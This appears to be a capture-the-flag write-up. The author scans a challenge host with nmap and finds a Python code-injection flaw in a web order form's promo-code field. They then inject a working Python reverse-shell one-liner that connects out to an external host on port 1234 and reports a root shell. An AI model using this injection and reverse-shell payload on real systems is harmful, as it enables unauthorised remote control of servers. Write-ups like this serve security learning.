As always, quick nmap scan:
$ nmap 220.127.116.11 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-06 15:57 GMT Nmap scan report for ec2-3-9-188-161.eu-west-2.compute.amazonaws.com (18.104.22.168) Host is up (0.0037s latency). Not shown: 990 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp filtered smtp 53/tcp filtered domain 80/tcp open http 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 445/tcp filtered microsoft-ds 2000/tcp open cisco-sccp 5060/tcp open sip 8008/tcp open http Nmap done: 1 IP address (1 host up) scanned in 1.27 seconds
We have a web application on port 80:
The challenge description makes it clear that we have to inject some command into the promo code field of the order page. We can totally ignore the account mechanism.
Let’s try with a very simple payload: a single quote
'. We get back an error:
The error looks like a Python quote parsing issue. My guess is that the backend looks something like:
promo_code = ord('<USER_INPUT>')
If my guess is correct, the payload
') # should produce no error, as we just complete the function call and transform the end of the line into a comment like so:
promo_code = ord('') #')
My guess turned to be correct. So I decided to inject some reverse shell payload. A friend told me to take a look at this website.
Let’s tweak their Python payload a little bit:
'); import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("geographer.fr",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); #
We get a root shell immediately: